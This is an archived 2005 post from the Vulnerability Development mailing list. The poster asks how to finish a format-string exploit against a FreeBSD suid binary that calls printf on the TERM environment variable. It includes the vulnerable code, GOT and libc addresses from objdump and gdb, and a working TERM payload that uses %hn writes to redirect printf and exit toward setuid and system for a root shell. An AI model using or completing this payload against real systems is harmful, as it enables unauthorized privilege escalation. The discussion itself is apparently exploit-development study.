Vulnerability Development mailing list archives
Format Strings nonexec heap/stack
From: Alex <alex00882007 () gmail com>
Date: Sun, 30 Jan 2005 01:04:43 -0500
Hello, this is my first post. I hope its in the list. I am posting to get some help in developing an exploit for such a condition. The environment: Freebsd machine, nonexec heap/stack. This is a suid binary, but is not calling setuid(). main() { char * ptr ; ptr = getenv("TERM"); if(ptr) printf(ptr); printf("\n"); exit(0); } objdump -R | grep printf 0804999c R_386_JUMP_SLOT printf objdump -R | grep exit 080499b0 R_386_JUMP_SLOT exit (gdb) p setuid $1 = {<text variable, no debug info>} 0x280c1370 <setuid> (gdb) p system $2 = {<text variable, no debug info>} 0x28093a38 <system> Using a format string it is possible to over-write the GOT entries for printf() and exit(). I have been able to do so successfully. The problem is that it is not enough to do just that, since it will become system("\n") or system(0); On freebsd, arguments are passed via pushing to the stack. What I have been trying to do is this. After rewriting the GOT entry for printf as that of setuid(), i want to push a NULL byte onto the stack to call setuid(0); The GOT entry for exit() has been replaced by that of system(). So instead of pushing 0x0, i want to push a pointer to a "/bin/sh" string. Is this possible even? Or is there a better way of doing this. to ovewrrite GOT: export TERM=` printf \ "\x9c\x99\x04\x08\x9e\x99\x04\x08\xb0\x99\x04\x08\xb2\x99\x04\x08"`\ %.4960u%OFFSET\$hn%.5276u%OFFSET+1\$hn%.9628u%OFFSET+2\$hn%.60881u%OFFSET+3\$hn where OFFSET = stackpop(?). Usually this is ~130 but it depends on how your environmental variables are setup. Im not sure what I would do next in order to change the values that are being pushed. Could someone help me with this?
Current thread:
- Format Strings nonexec heap/stack Alex (Jan 30)